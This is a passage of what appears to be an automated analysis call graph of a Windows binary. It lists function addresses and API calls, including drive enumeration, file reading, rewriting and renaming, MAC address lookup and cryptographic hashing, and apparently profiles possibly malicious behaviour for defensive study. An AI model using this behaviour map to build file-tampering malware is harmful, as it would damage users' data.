39549->39551 40188 e51b3b 59 API calls 3 library calls 39549->40188 39550->39549 39551->39549 39554 e436e7 39553->39554 39555 e43742 39553->39555 39554->39555 39556 e436ed 39554->39556 39560 e4370d 39555->39560 40190 e44f70 59 API calls 39555->40190 39556->39560 40189 e44f70 59 API calls 39556->40189 39558 e4377f 39562 e3ca70 39558->39562 39560->39558 39561 e44690 59 API calls 39560->39561 39561->39558 39566 e3cb64 39562->39566 39568 e3caa3 39562->39568 39563 e3cb6b 40191 e7f26c 59 API calls 3 library calls 39563->40191 39565 e3cb75 39565->39076 39566->39076 39567 e436c0 59 API calls 39567->39568 39568->39563 39568->39566 39568->39567 39570 e44690 59 API calls 39569->39570 39571 e430d4 39570->39571 39572 e3c740 39571->39572 40192 e50fdd 39572->40192 39575 e3c944 CreateDirectoryW 39577 e50fdd 115 API calls 39575->39577 39582 e3c960 39577->39582 39578 e3c90e 39578->39575 39588 e3c96a 39578->39588 39579 e3c906 39580 e53a38 __fcloseall 83 API calls 39579->39580 39580->39578 39587 e528fd _fputws 82 API calls 39582->39587 39582->39588 39592 e3c9d5 39582->39592 39584 e3c9ed 39586 e528fd _fputws 82 API calls 39584->39586 39589 e3c9f8 39586->39589 39587->39582 39588->39082 40208 e53a38 39589->40208 39590 e45c10 59 API calls 39594 e3c79e _memmove 39590->39594 40195 e528fd 39592->40195 39593 e44f70 59 API calls 39593->39594 39594->39579 39594->39590 39594->39593 40222 e51101 76 API calls 6 library calls 39594->40222 40223 e50546 58 API calls 2 library calls 39594->40223 39596 e41223 GetFileSizeEx 39595->39596 39612 e41287 39595->39612 39597 e41234 39596->39597 39598 e412a3 VirtualAlloc 39596->39598 39597->39598 39600 e4123c CloseHandle 39597->39600 39599 e4131a CloseHandle 39598->39599 39604 e412c0 _memset 39598->39604 39599->39085 39601 e43100 59 API calls 39600->39601 39602 e41253 39601->39602 40455 e459d0 39602->40455 39603 e413a7 39607 e413b7 SetFilePointer 39603->39607 39604->39603 39606 e412e9 SetFilePointerEx 39604->39606 39609 e41332 ReadFile 39606->39609 39610 e4130c VirtualFree 39606->39610 39611 e413f5 ReadFile 39607->39611 39676 e415ae 39607->39676 39608 e4126a MoveFileW 39608->39612 39609->39610 39613 e4134f 39609->39613 39610->39599 39614 e41440 39611->39614 39615 e4140f VirtualFree CloseHandle 39611->39615 39612->39085 39613->39610 39617 e41356 39613->39617 39620 e41471 lstrlenA 39614->39620 39621 e41718 lstrlenA 39614->39621 39614->39676 39618 e4142f 39615->39618 39616 e415c5 SetFilePointerEx 39616->39615 39619 e415df 39616->39619 39617->39607 39627 e42c40 59 API calls 39617->39627 39618->39085 39622 e415ed WriteFile 39619->39622 39624 e41602 39619->39624 40481 e50be4 39620->40481 40533 e50be4 39621->40533 39622->39615 39622->39624 39625 e430b0 59 API calls 39624->39625 39629 e41631 39625->39629 39631 e41364 39627->39631 39628 e41480 lstrlenA 39632 e5d8d0 ___init_ctype 39628->39632 39633 e42840 60 API calls 39629->39633 39631->39603 39638 e41379 VirtualFree CloseHandle 39631->39638 39635 e414a5 lstrlenA 39632->39635 39636 e4163c WriteFile 39633->39636 39639 e3eaa0 91 API calls 39635->39639 39644 e41658 39636->39644 39642 e41396 39638->39642 39643 e414e0 39639->39643 39642->39085 39646 e3c5c0 62 API calls 39643->39646 39644->39615 39645 e41660 lstrlenA WriteFile 39644->39645 39645->39615 39647 e41686 CloseHandle 39645->39647 39657 e414f6 39646->39657 39648 e43100 59 API calls 39647->39648 39649 e416a3 39648->39649 39650 e459d0 59 API calls 39649->39650 39652 e416be MoveFileW 39650->39652 39654 e416e4 VirtualFree 39652->39654 39658 e418a7 39652->39658 39659 e416fc 39654->39659 39660 e43ff0 59 API calls 39657->39660 39662 e418d5 VirtualFree 39658->39662 39663 e418e3 39658->39663 39659->39085 39661 e41560 39660->39661 39664 e42f70 59 API calls 39661->39664 39662->39663 39663->39612 39665 e418e8 CloseHandle 39663->39665 39667 e4156f 39664->39667 39665->39612 39666 e417cb 39669 e42c40 59 API calls 39666->39669 39668 e3c070 98 API calls 39667->39668 39670 e41591 SetFilePointer 39668->39670 39671 e417ff 39669->39671 39670->39666 39670->39676 39672 e42bf0 59 API calls 39671->39672 39673 e41814 39672->39673 40482 e3cba0 39673->40482 39675 e41820 39677 e4186e VirtualFree CloseHandle 39675->39677 39678 e41834 WriteFile 39675->39678 39676->39616 39679 e4188b 39677->39679 39678->39676 39678->39677 39679->39085 39680->39088 39682 e4bab9 39681->39682 39683 e4babb ShowWindow UpdateWindow 39681->39683 39682->39090 39683->39090 39687 e40a81 39684->39687 39685 e456d0 59 API calls 39685->39687 39686 e40bb4 39686->39094 39687->39685 39687->39686 39688 e43ea0 59 API calls 39687->39688 39691 e43ff0 59 API calls 39687->39691 39692 e42900 60 API calls 39687->39692 39693 e43580 59 API calls 39687->39693 39689 e40ae0 SetErrorMode PathFileExistsA SetErrorMode 39688->39689 39689->39687 39690 e40b0c GetDriveTypeA 39689->39690 39690->39687 39691->39687 39692->39687 39693->39687 39695 e4d3c0 59 API calls 39694->39695 39696 e4c347 39695->39696 39697 e4c35b 39696->39697 40625 e7f23e 59 API calls 2 library calls 39696->40625 39697->39120 39701 e4d340 59 API calls 39700->39701 39702 e4c257 39701->39702 39703 e4c26b 39702->39703 40626 e7f23e 59 API calls 2 library calls 39702->40626 39703->39120 39707 e4b8d6 39706->39707 39710 e4b8e0 39706->39710 39708 e44690 59 API calls 39707->39708 39708->39710 39709 e4b916 39712 e4b930 39709->39712 39713 e44690 59 API calls 39709->39713 39710->39709 39711 e44690 59 API calls 39710->39711 39711->39709 39714 e4b94a 39712->39714 39715 e44690 59 API calls 39712->39715 39713->39712 39716 e4b964 39714->39716 39718 e44690 59 API calls 39714->39718 39715->39714 40627 e4bfd0 39716->40627 39718->39716 39719 e4b976 39720 e4bfd0 59 API calls 39719->39720 39721 e4b988 39720->39721 39722 e4bfd0 59 API calls 39721->39722 39723 e4b99a 39722->39723 39724 e4b9b4 39723->39724 39725 e44690 59 API calls 39723->39725 39726 e4b9f2 39724->39726 39727 e43ff0 59 API calls 39724->39727 39725->39724 39726->39120 39727->39726 39729 e4326f 39728->39729 39731 e4327d 39728->39731 39730 e45c10 59 API calls 39729->39730 39732 e43278 39730->39732 39731->39731 39733 e45c10 59 API calls 39731->39733 39732->39120 39734 e4329c 39733->39734 39734->39120 39735->39120 40643 e4f130 timeGetTime 39735->40643 39736->39100 40819 e4fd80 39736->40819 39737->38872 39739 e41af4 39738->39739 39740 e41ad0 39738->39740 39739->38916 39741 e41afc 39740->39741 39742 e41adc DispatchMessageW PeekMessageW 39740->39742 39741->38916 39742->39739 39742->39740 39744 e4478c 39743->39744 39745 e446a9 39743->39745 40834 e7f26c 59 API calls 3 library calls 39744->40834 39747 e446b6 39745->39747 39748 e446e9 39745->39748 39749 e44796 39747->39749 39750 e446c2 39747->39750 39751 e446f5 39748->39751 39752 e447a0 39748->39752 40835 e7f26c 59 API calls 3 library calls 39749->40835 40832 e43340 59 API calls _memmove 39750->40832 39762 e44707 ___init_ctype 39751->39762 40833 e46950 59 API calls 2 library calls 39751->40833 40836 e7f23e 59 API calls 2 library calls 39752->40836 39761 e446e0 39761->38919 39762->38919 39766->38937 39767->38918 39768->39061 39769->39093 39773 e45735 39772->39773 39778 e456de 39772->39778 39774 e457bc 39773->39774 39775 e4573e 39773->39775 39794 e7f23e 59 API calls 2 library calls 39774->39794 39782 e45750 ___init_ctype 39775->39782 39793 e46760 59 API calls 2 library calls 39775->39793 39778->39773 39784 e45704 39778->39784 39782->39318 39785 e4571f 39784->39785 39786 e45709 39784->39786 39788 e43ff0 59 API calls 39785->39788 39787 e43ff0 59 API calls 39786->39787 39789 e45719 39787->39789 39790 e4572f 39788->39790 39789->39318 39790->39318 39791->39322 39792->39324 39793->39782 39801 e53b4c 39795->39801 39797 e4ccca 39798 e4a00a 39797->39798 39811 e7f1bb 59 API calls 3 library calls 39797->39811 39798->38875 39798->38876 39805 e53b54 39801->39805 39802 e50c62 _malloc 58 API calls 39802->39805 39803 e53b6e 39803->39797 39805->39802 39805->39803 39806 e53b72 std::exception::exception 39805->39806 39812 e5793d DecodePointer 39805->39812 39813 e60eca RaiseException 39806->39813 39808 e53b9c 39814 e60d91 58 API calls _free 39808->39814 39810 e53bae 39810->39797 39812->39805 39813->39808 39814->39810 39816 e53b4c 59 API calls 39815->39816 39817 e4cc5d 39816->39817 39819 e4cc64 39817->39819 39822 e7f1bb 59 API calls 3 library calls 39817->39822 39819->39331 39821 e4d740 59 API calls 39819->39821 39821->39331 39825->39348 39826->39348 39830 e61570 39827->39830 39831 e61580 39830->39831 39832 e61586 39831->39832 39837 e615ae 39831->39837 39833 e55208 __flsbuf 58 API calls 39832->39833 39834 e6158b 39833->39834 39841 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 39834->39841 39838 e615cf wcstoxl 39837->39838 39842 e5e883 GetStringTypeW 39837->39842 39839 e55208 __flsbuf 58 API calls 39838->39839 39840 e4a36e lstrcpyW lstrcpyW 39838->39840 39839->39840 39840->38909 39841->39840 39842->39837 39844 e41cf2 RegOpenKeyExW 39843->39844 39844->39355 39844->39356 39846 e44690 59 API calls 39845->39846 39847 e43550 39846->39847 39847->39370 39849 e502b6 39848->39849 39850 e50241 39848->39850 39859 e502c8 60 API calls 4 library calls 39849->39859 39852 e55208 __flsbuf 58 API calls 39850->39852 39857 e50266 39850->39857 39854 e5024d 39852->39854 39853 e502c3 39853->39402 39858 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 39854->39858 39856 e50258 39856->39402 39857->39402 39858->39856 39859->39853 39860->39429 39861->39428 39862->39419 39866 e50c62 _malloc 58 API calls 39865->39866 39867 e3e684 39866->39867 39868 e50c62 _malloc 58 API calls 39867->39868 39869 e3e690 39868->39869 39870 e3e6b4 GetAdaptersInfo 39869->39870 39871 e3e699 39869->39871 39873 e3e6c4 39870->39873 39874 e3e6db GetAdaptersInfo 39870->39874 39872 e51f2d _wprintf 85 API calls 39871->39872 39875 e3e6a3 39872->39875 39876 e50bed _free 58 API calls 39873->39876 39877 e3e6ea 39874->39877 39890 e3e741 39874->39890 39879 e50bed _free 58 API calls 39875->39879 39881 e3e6ca 39876->39881 39915 e504a6 39877->39915 39883 e3e6a9 39879->39883 39880 e50bed _free 58 API calls 39884 e3e74a 39880->39884 39885 e50c62 _malloc 58 API calls 39881->39885 39883->39432 39884->39432 39887 e3e6d2 39885->39887 39887->39871 39887->39874 39888 e3e737 39889 e51f2d _wprintf 85 API calls 39888->39889 39889->39890 39890->39880 39892 e456d0 59 API calls 39891->39892 39893 e3e8bb CryptAcquireContextW 39892->39893 39894 e3e8e9 CryptCreateHash 39893->39894 39895 e3e8d8 39893->39895 39897 e3e903 39894->39897 39898 e3e914 CryptHashData 39894->39898 40146 e60eca RaiseException 39895->40146 40147 e60eca RaiseException 39897->40147 39900 e3e943 CryptGetHashParam 39898->39900 39901 e3e932 39898->39901 39903 e3e963 39900->39903 39905 e3e974 _memset 39900->39905 40148 e60eca RaiseException 39901->40148 40149 e60eca RaiseException 39903->40149 39906 e3e993 CryptGetHashParam 39905->39906 39907 e3e9a8 39906->39907 39914 e3e9b9 39906->39914 40150 e60eca RaiseException 39907->40150 39909 e3ea10 39911 e3ea16 CryptDestroyHash CryptReleaseContext 39909->39911 39910 e504a6 _sprintf 83 API calls 39910->39914 39912 e3ea33 39911->39912 39912->39438 39913 e43ea0 59 API calls 39913->39914 39914->39909 39914->39910 39914->39913 39916 e504d7 39915->39916 39917 e504c2 39915->39917 39916->39917 39919 e504de 39916->39919 39918 e55208 __flsbuf 58 API calls 39917->39918 39920 e504c7 39918->39920 39944 e56ab6 39919->39944 39943 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 39920->39943 39923 e3e725 39926 e51f2d 39923->39926 39924 e50504 39924->39923 39968 e564ef 78 API calls 4 library calls 39924->39968 39927 e51f39 _wprintf 39926->39927 39928 e51f5f __flsbuf 39927->39928 39929 e51f4a 39927->39929 39995 e50e92 39928->39995 39930 e55208 __flsbuf 58 API calls 39929->39930 39931 e51f4f 39930->39931 40011 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 39931->40011 39934 e51f6f __flsbuf 40000 e5afd2 39934->40000 39936 e51f5a _wprintf 39936->39888 39937 e51f82 __flsbuf 39938 e56ab6 __output_l 83 API calls 39937->39938 39939 e51f9b __flsbuf 39938->39939 40007 e5afa1 39939->40007 39943->39923 39969 e5019c 39944->39969 39947 e55208 __flsbuf 58 API calls 39948 e56b30 39947->39948 39949 e57601 39948->39949 39958 e56b50 __output_l __aulldvrm _strlen 39948->39958 39977 e5816b 39948->39977 39950 e55208 __flsbuf 58 API calls 39949->39950 39952 e57606 39950->39952 39985 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 39952->39985 39953 e575db 39955 e5a77e __cftog_l 6 API calls 39953->39955 39956 e575fd 39955->39956 39956->39924 39958->39949 39958->39953 39959 e5766a 78 API calls __output_l 39958->39959 39960 e571b9 DecodePointer 39958->39960 39961 e50bed _free 58 API calls 39958->39961 39962 e6adf7 60 API calls __cftof 39958->39962 39963 e58cde __malloc_crt 58 API calls 39958->39963 39964 e5721c DecodePointer 39958->39964 39965 e576de 78 API calls _write_string 39958->39965 39966 e57241 DecodePointer 39958->39966 39967 e576b2 78 API calls _write_multi_char 39958->39967 39984 e52bcc 58 API calls _LocaleUpdate::_LocaleUpdate 39958->39984 39959->39958 39960->39958 39961->39958 39962->39958 39963->39958 39964->39958 39965->39958 39966->39958 39967->39958 39968->39923 39970 e501ad 39969->39970 39976 e501fa 39969->39976 39986 e55007 39970->39986 39972 e501b3 39973 e501da 39972->39973 39991 e545dc 58 API calls 6 library calls 39972->39991 39973->39976 39992 e5495e 58 API calls 6 library calls 39973->39992 39976->39947 39978 e58175 39977->39978 39979 e5818a 39977->39979 39980 e55208 __flsbuf 58 API calls 39978->39980 39979->39958 39981 e5817a 39980->39981 39994 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 39981->39994 39983 e58185 39983->39958 39984->39958 39985->39953 39987 e5501f __getptd_noexit 58 API calls 39986->39987 39988 e5500d 39987->39988 39989 e5501a 39988->39989 39993 e57c2e 58 API calls 3 library calls 39988->39993 39989->39972 39991->39973 39992->39976 39994->39983 39996 e50eb3 EnterCriticalSection 39995->39996 39997 e50e9d 39995->39997 39996->39934 39998 e58af7 __lock 58 API calls 39997->39998 39999 e50ea6 39998->39999 39999->39934 40001 e5816b __flsbuf 58 API calls 40000->40001 40002 e5afdf 40001->40002 40013 e689c2 40002->40013 40004 e5b034 40004->39937 40005 e5afe5 __flsbuf 40005->40004 40006 e58cde __malloc_crt 58 API calls 40005->40006 40006->40004 40008 e51faf 40007->40008 40009 e5afaa 40007->40009 40012 e51fc9 LeaveCriticalSection LeaveCriticalSection __flsbuf __getstream 40008->40012 40009->40008 40023 e5836b 40009->40023 40011->39936 40012->39936 40014 e689cd 40013->40014 40016 e689da 40013->40016 40015 e55208 __flsbuf 58 API calls 40014->40015 40017 e689d2 40015->40017 40018 e689e6 40016->40018 40019 e55208 __flsbuf 58 API calls 40016->40019 40017->40005 40018->40005 40020 e68a07 40019->40020 40022 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40020->40022 40022->40017 40024 e5837e 40023->40024 40025 e583a2 40023->40025 40024->40025 40026 e5816b __flsbuf 58 API calls 40024->40026 40025->40008 40027 e5839b 40026->40027 40029 e5df14 40027->40029 40030 e5df20 _wprintf 40029->40030 40031 e5df2d 40030->40031 40033 e5df44 40030->40033 40129 e551d4 58 API calls __getptd_noexit 40031->40129 40032 e5dfe3 40133 e551d4 58 API calls __getptd_noexit 40032->40133 40033->40032 40036 e5df58 40033->40036 40035 e5df32 40038 e55208 __flsbuf 58 API calls 40035->40038 40039 e5df76 40036->40039 40040 e5df80 40036->40040 40050 e5df39 _wprintf 40038->40050 40130 e551d4 58 API calls __getptd_noexit 40039->40130 40057 e6b134 40040->40057 40041 e5df7b 40045 e55208 __flsbuf 58 API calls 40041->40045 40044 e5df86 40046 e5dfac 40044->40046 40047 e5df99 40044->40047 40048 e5dfef 40045->40048 40049 e55208 __flsbuf 58 API calls 40046->40049 40066 e5e003 40047->40066 40134 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40048->40134 40053 e5dfb1 40049->40053 40050->40025 40131 e551d4 58 API calls __getptd_noexit 40053->40131 40054 e5dfa5 40132 e5dfdb LeaveCriticalSection __unlock_fhandle 40054->40132 40058 e6b140 _wprintf 40057->40058 40059 e6b18f EnterCriticalSection 40058->40059 40060 e58af7 __lock 58 API calls 40058->40060 40061 e6b1b5 _wprintf 40059->40061 40062 e6b165 40060->40062 40061->40044 40063 e6b17d 40062->40063 40135 e6263e InitializeCriticalSectionAndSpinCount 40062->40135 40136 e6b1b9 LeaveCriticalSection _doexit 40063->40136 40067 e5e010 __write_nolock 40066->40067 40068 e5e04f 40067->40068 40069 e5e06e 40067->40069 40099 e5e044 40067->40099 40137 e551d4 58 API calls __getptd_noexit 40068->40137 40073 e5e0c6 40069->40073 40074 e5e0aa 40069->40074 40070 e5a77e __cftog_l 6 API calls 40075 e5e864 40070->40075 40072 e5e054 40076 e55208 __flsbuf 58 API calls 40072->40076 40077 e5e0df 40073->40077 40141 e5f744 60 API calls 3 library calls 40073->40141 40139 e551d4 58 API calls __getptd_noexit 40074->40139 40075->40054 40079 e5e05b 40076->40079 40081 e689c2 __flsbuf 58 API calls 40077->40081 40138 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40079->40138 40084 e5e0ed 40081->40084 40082 e5e0af 40085 e55208 __flsbuf 58 API calls 40082->40085 40086 e5e446 40084->40086 40091 e55007 _GetLcidFromLangCountry 58 API calls 40084->40091 40087 e5e0b6 40085->40087 40088 e5e464 40086->40088 40089 e5e7d9 WriteFile 40086->40089 40140 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40087->40140 40092 e5e588 40088->40092 40102 e5e47a 40088->40102 40093 e5e678 40089->40093 40094 e5e439 GetLastError 40089->40094 40096 e5e119 GetConsoleMode 40091->40096 40104 e5e593 40092->40104 40107 e5e67d 40092->40107 40095 e5e406 40093->40095 40094->40095 40097 e5e812 40095->40097 40095->40099 40106 e5e566 40095->40106 40096->40086 40098 e5e158 40096->40098 40097->40099 40100 e55208 __flsbuf 58 API calls 40097->40100 40098->40086 40101 e5e168 GetConsoleCP 40098->40101 40099->40070 40105 e5e840 40100->40105 40101->40097 40122 e5e197 40101->40122 40102->40095 40102->40097 40103 e5e4e9 WriteFile 40102->40103 40103->40094 40103->40102 40104->40097 40108 e5e5f8 WriteFile 40104->40108 40145 e551d4 58 API calls __getptd_noexit 40105->40145 40110 e5e571 40106->40110 40111 e5e809 40106->40111 40107->40097 40112 e5e6f2 WideCharToMultiByte 40107->40112 40108->40094 40113 e5e647 40108->40113 40114 e55208 __flsbuf 58 API calls 40110->40114 40144 e551e7 58 API calls 3 library calls 40111->40144 40112->40094 40121 e5e739 40112->40121 40113->40093 40113->40095 40113->40104 40117 e5e576 40114->40117 40116 e5e741 WriteFile 40119 e5e794 GetLastError 40116->40119 40116->40121 40143 e551d4 58 API calls __getptd_noexit 40117->40143 40119->40121 40121->40093 40121->40095 40121->40107 40121->40116 40122->40095 40123 e6c76c 60 API calls __putch_nolock 40122->40123 40124 e5e280 WideCharToMultiByte 40122->40124 40127 e5e2ed 40122->40127 40142 e52d33 58 API calls __isleadbyte_l 40122->40142 40123->40122 40124->40095 40125 e5e2bb WriteFile 40124->40125 40125->40094 40125->40127 40126 e7058c WriteConsoleW CreateFileW __putwch_nolock 40126->40127 40127->40094 40127->40095 40127->40122 40127->40126 40128 e5e315 WriteFile 40127->40128 40128->40094 40128->40127 40129->40035 40130->40041 40131->40054 40132->40050 40133->40041 40134->40050 40135->40063 40136->40059 40137->40072 40138->40099 40139->40082 40140->40099 40141->40077 40142->40122 40143->40099 40144->40099 40145->40099 40146->39894 40147->39898 40148->39900 40149->39905 40150->39914 40151->39452 40154 e43c62 40153->40154 40161 e43c74 _memset 40153->40161 40155 e43c96 40154->40155 40156 e43c67 40154->40156 40170 e7f23e 59 API calls 2 library calls 40155->40170 40158 e53b4c 59 API calls 40156->40158 40159 e43c6d 40158->40159 40159->40161 40171 e7f1bb 59 API calls 3 library calls 40159->40171 40161->39456 40164 e48513 40163->40164 40169 e48520 40163->40169 40164->40169 40172 e45810 59 API calls ___init_ctype 40164->40172 40165 e48619 40165->39458 40167 e7f23e 59 API calls 40167->40169 40169->40165 40169->40167 40173 e46760 59 API calls 2 library calls 40169->40173 40172->40169 40173->40169 40174->39461 40175->39464 40176->39467 40177->39471 40178->39474 40179->39500 40180->39503 40181->39505 40182->39488 40183->39490 40185->39520 40186->39520 40187->39549 40188->39549 40189->39560 40190->39560 40191->39565 40224 e51037 40192->40224 40194 e3c78a 40194->39578 40221 e50546 58 API calls 2 library calls 40194->40221 40196 e52909 _wprintf 40195->40196 40197 e5291c 40196->40197 40198 e52941 _GetLcidFromLangCountry 40196->40198 40199 e55208 __flsbuf 58 API calls 40197->40199 40426 e50e53 40198->40426 40200 e52921 40199->40200 40425 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40200->40425 40203 e5292c _wprintf 40203->39584 40204 e52950 40205 e52981 40204->40205 40432 e5d6c7 80 API calls 4 library calls 40204->40432 40433 e529a1 LeaveCriticalSection LeaveCriticalSection _setvbuf 40205->40433 40209 e53a44 _wprintf 40208->40209 40210 e53a70 40209->40210 40211 e53a58 40209->40211 40214 e50e53 __lock_file 59 API calls 40210->40214 40217 e53a68 _wprintf 40210->40217 40212 e55208 __flsbuf 58 API calls 40211->40212 40213 e53a5d 40212->40213 40450 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40213->40450 40216 e53a82 40214->40216 40434 e539cc 40216->40434 40217->39588 40221->39594 40222->39594 40223->39594 40226 e51043 _wprintf 40224->40226 40225 e51056 40227 e55208 __flsbuf 58 API calls 40225->40227 40226->40225 40228 e51087 40226->40228 40229 e5105b 40227->40229 40243 e58df4 40228->40243 40273 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40229->40273 40232 e5108c 40233 e51095 40232->40233 40234 e510a2 40232->40234 40235 e55208 __flsbuf 58 API calls 40233->40235 40236 e510cc 40234->40236 40237 e510ac 40234->40237 40238 e51066 _wprintf @_EH4_CallFilterFunc@8 40235->40238 40258 e58f13 40236->40258 40239 e55208 __flsbuf 58 API calls 40237->40239 40238->40194 40239->40238 40244 e58e00 _wprintf 40243->40244 40245 e58af7 __lock 58 API calls 40244->40245 40256 e58e0e 40245->40256 40246 e58e82 40275 e58f0a 40246->40275 40247 e58e89 40249 e58cde __malloc_crt 58 API calls 40247->40249 40251 e58e90 40249->40251 40250 e58eff _wprintf 40250->40232 40251->40246 40279 e6263e InitializeCriticalSectionAndSpinCount 40251->40279 40253 e58b9f __mtinitlocknum 58 API calls 40253->40256 40254 e50e92 _wprintf 59 API calls 40254->40256 40255 e58eb6 EnterCriticalSection 40255->40246 40256->40246 40256->40247 40256->40253 40256->40254 40278 e50efc LeaveCriticalSection LeaveCriticalSection _doexit 40256->40278 40267 e58f33 _TestDefaultCountry 40258->40267 40259 e58f4d 40260 e55208 __flsbuf 58 API calls 40259->40260 40262 e58f52 40260->40262 40261 e59108 40261->40259 40265 e5916b 40261->40265 40284 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40262->40284 40264 e510d7 40274 e510f9 LeaveCriticalSection LeaveCriticalSection _setvbuf 40264->40274 40281 e6c214 40265->40281 40267->40259 40267->40261 40285 e6c232 60 API calls 3 library calls 40267->40285 40269 e59101 40269->40261 40286 e6c232 60 API calls 3 library calls 40269->40286 40271 e59120 40271->40261 40287 e6c232 60 API calls 3 library calls 40271->40287 40273->40238 40274->40238 40280 e58c81 LeaveCriticalSection 40275->40280 40277 e58f11 40277->40250 40278->40256 40279->40255 40280->40277 40288 e6b9f8 40281->40288 40283 e6c22d 40283->40264 40284->40264 40285->40269 40286->40271 40287->40261 40291 e6ba04 _wprintf 40288->40291 40289 e6ba1a 40290 e55208 __flsbuf 58 API calls 40289->40290 40292 e6ba1f 40290->40292 40291->40289 40293 e6ba50 40291->40293 40373 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40292->40373 40299 e6bac1 40293->40299 40298 e6ba29 _wprintf 40298->40283 40300 e6bae1 40299->40300 40375 e77f50 40300->40375 40302 e6bc34 40303 e542fd __wsopen_nolock 8 API calls 40302->40303 40304 e6c213 40303->40304 40305 e6bafd 40305->40302 40306 e6bb37 40305->40306 40311 e6bb5a 40305->40311 40406 e551d4 58 API calls __getptd_noexit 40306->40406 40308 e6bb3c 40309 e55208 __flsbuf 58 API calls 40308->40309 40310 e6bb49 40309->40310 40407 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40310->40407 40312 e6bc18 40311->40312 40320 e6bbf6 40311->40320 40408 e551d4 58 API calls __getptd_noexit 40312->40408 40315 e6ba6c 40374 e6ba95 LeaveCriticalSection __unlock_fhandle 40315->40374 40316 e6bc1d 40317 e55208 __flsbuf 58 API calls 40316->40317 40318 e6bc2a 40317->40318 40409 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40318->40409 40382 e6b1c2 40320->40382 40322 e6bcc4 40323 e6bcf1 40322->40323 40324 e6bcce 40322->40324 40400 e6b88d 40323->40400 40410 e551d4 58 API calls __getptd_noexit 40324->40410 40327 e6bcd3 40329 e55208 __flsbuf 58 API calls 40327->40329 40328 e6bd91 GetFileType 40332 e6bdde 40328->40332 40333 e6bd9c GetLastError 40328->40333 40331 e6bcdd 40329->40331 40330 e6bd5f GetLastError 40411 e551e7 58 API calls 3 library calls 40330->40411 40336 e55208 __flsbuf 58 API calls 40331->40336 40413 e6b56e 59 API calls 2 library calls 40332->40413 40412 e551e7 58 API calls 3 library calls 40333->40412 40336->40315 40338 e6bdc3 CloseHandle 40340 e6bd84 40338->40340 40341 e6bdd1 40338->40341 40339 e6b88d ___createFile 3 API calls 40342 e6bd54 40339->40342 40346 e55208 __flsbuf 58 API calls 40340->40346 40344 e55208 __flsbuf 58 API calls 40341->40344 40342->40328 40342->40330 40347 e6bdd6 40344->40347 40345 e6bdfc 40348 e6bfb7 40345->40348 40365 e6be7d 40345->40365 40414 e5f744 60 API calls 3 library calls 40345->40414 40346->40302 40347->40340 40348->40302 40350 e6c18a CloseHandle 40348->40350 40352 e6b88d ___createFile 3 API calls 40350->40352 40351 e6be66 40370 e6be85 40351->40370 40415 e551d4 58 API calls __getptd_noexit 40351->40415 40355 e6c1b1 40352->40355 40354 e5b5c4 70 API calls __read_nolock 40354->40370 40356 e6c041 40355->40356 40357 e6c1b9 GetLastError 40355->40357 40356->40302 40419 e551e7 58 API calls 3 library calls 40357->40419 40359 e6c1c5 40420 e6b36b 59 API calls 2 library calls 40359->40420 40361 e5f744 60 API calls __lseeki64_nolock 40361->40370 40364 e5df14 __write 78 API calls 40364->40365 40365->40348 40365->40364 40367 e5f744 60 API calls __lseeki64_nolock 40365->40367 40365->40370 40366 e6c034 40418 e60b25 61 API calls 3 library calls 40366->40418 40367->40365 40368 e6c01d 40368->40348 40370->40354 40370->40361 40370->40365 40370->40366 40370->40368 40416 e60b25 61 API calls 3 library calls 40370->40416 40417 e77cac 82 API calls 6 library calls 40370->40417 40371 e6c03b 40372 e55208 __flsbuf 58 API calls 40371->40372 40372->40356 40373->40298 40374->40298 40376 e77f6f 40375->40376 40377 e77f5a 40375->40377 40376->40305 40378 e55208 __flsbuf 58 API calls 40377->40378 40379 e77f5f 40378->40379 40421 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40379->40421 40381 e77f6a 40381->40305 40383 e6b1ce _wprintf 40382->40383 40384 e58b9f __mtinitlocknum 58 API calls 40383->40384 40385 e6b1df 40384->40385 40386 e6b1e4 _wprintf 40385->40386 40387 e58af7 __lock 58 API calls 40385->40387 40386->40322 40396 e6b1f2 40387->40396 40388 e6b340 40424 e6b362 LeaveCriticalSection _doexit 40388->40424 40390 e6b2d2 40391 e58c96 __calloc_crt 58 API calls 40390->40391 40395 e6b2db 40391->40395 40392 e58af7 __lock 58 API calls 40392->40396 40393 e6b272 EnterCriticalSection 40394 e6b282 LeaveCriticalSection 40393->40394 40393->40396 40394->40396 40395->40388 40397 e6b134 ___lock_fhandle 59 API calls 40395->40397 40396->40388 40396->40390 40396->40392 40396->40393 40422 e6263e InitializeCriticalSectionAndSpinCount 40396->40422 40423 e6b29a LeaveCriticalSection _doexit 40396->40423 40397->40388 40401 e6b898 ___crtIsPackagedApp 40400->40401 40402 e6b8f3 CreateFileW 40401->40402 40403 e6b89c GetModuleHandleW GetProcAddress 40401->40403 40405 e6b911 40402->40405 40404 e6b8b9 40403->40404 40404->40405 40405->40328 40405->40330 40405->40339 40406->40308 40407->40315 40408->40316 40409->40302 40410->40327 40411->40340 40412->40338 40413->40345 40414->40351 40415->40365 40416->40370 40417->40370 40418->40371 40419->40359 40420->40356 40421->40381 40422->40396 40423->40396 40424->40386 40425->40203 40427 e50e85 EnterCriticalSection 40426->40427 40428 e50e63 40426->40428 40430 e50e7b 40427->40430 40428->40427 40429 e50e6b 40428->40429 40431 e58af7 __lock 58 API calls 40429->40431 40430->40204 40431->40430 40432->40204 40433->40203 40435 e539ef 40434->40435 40436 e539db 40434->40436 40438 e539eb 40435->40438 40440 e5836b __flush 78 API calls 40435->40440 40437 e55208 __flsbuf 58 API calls 40436->40437 40439 e539e0 40437->40439 40451 e53aa7 LeaveCriticalSection LeaveCriticalSection _setvbuf 40438->40451 40452 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40439->40452 40442 e539fb 